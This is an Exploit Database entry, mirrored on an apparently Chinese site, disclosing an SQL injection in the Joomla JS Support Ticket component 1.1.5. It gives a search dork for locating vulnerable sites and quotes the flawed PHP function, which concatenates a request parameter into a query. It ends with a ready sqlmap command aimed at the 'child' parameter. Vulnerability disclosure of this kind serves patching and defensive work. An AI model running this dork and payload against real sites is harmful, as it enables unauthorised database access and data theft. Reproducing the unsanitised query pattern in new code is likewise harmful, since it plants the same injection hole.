Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 – SQL Injection

Exploit Database
145 阅读

作者： qw3rTyTy

日期： 2019-08-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/47218/

#Exploit Title: Joomla! component com_jssupportticket - SQL Injection

#Dork: inurl:"index.php?option=com_jssupportticket"

#Date: 08.08.19

#Exploit Author: qw3rTyTy

#Vendor Homepage: https://www.joomsky.com/

#Software Link: https://www.joomsky.com/46/download/1.html

#Version: 1.1.5

#Tested on: Debian/nginx/joomla 3.9.0

#####################################

#Vulnerability details:

#####################################

Vulnerable code is in line 441 in file admin/models/userfields.php

439 function dataForDepandantField( $val , $childfield){

440 $db = $this->getDBO();

441 $query = "SELECT userfieldparams,fieldtitle,field,depandant_field FROM <code>#__js_ticket_fieldsordering</code> WHERE field = '".$childfield."'"; //!!!

442 $db->setQuery($query);

443 $data = $db->loadObject();

444 $decoded_data = json_decode($data->userfieldparams);

445 $comboOptions = array();

446 $flag = 0;

447 foreach ($decoded_data as $key => $value) {

448 if($key == $val){

449 for ($i=0; $i < count($value) ; $i++) {

450 if($flag == 0){

451 $comboOptions[] = array('value' => '', 'text' => JText::_('Select').' '.$data->fieldtitle);

452 }

453 $comboOptions[] = array('value' => $value[$i], 'text' => $value[$i]);

454 $flag = 1;

455 }

456 }

457 }

458 $jsFunction = '';

459 if ($data->depandant_field != null) {

460 $jsFunction = "onchange=getDataForDepandantField('" . $data->field . "','" . $data->depandant_field . "',1);";

461 }

462 $html = JHTML::_('select.genericList', $comboOptions , $childfield,'class="inputbox one"'.$jsFunction, 'value' , 'text' ,'');

463 return $html;

464 }

#####################################

#PoC:

#####################################

$> sqlmap.py -u "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=datafordepandantfield&fvalue=0&child=0" --random-agent -p child --dbms=mysql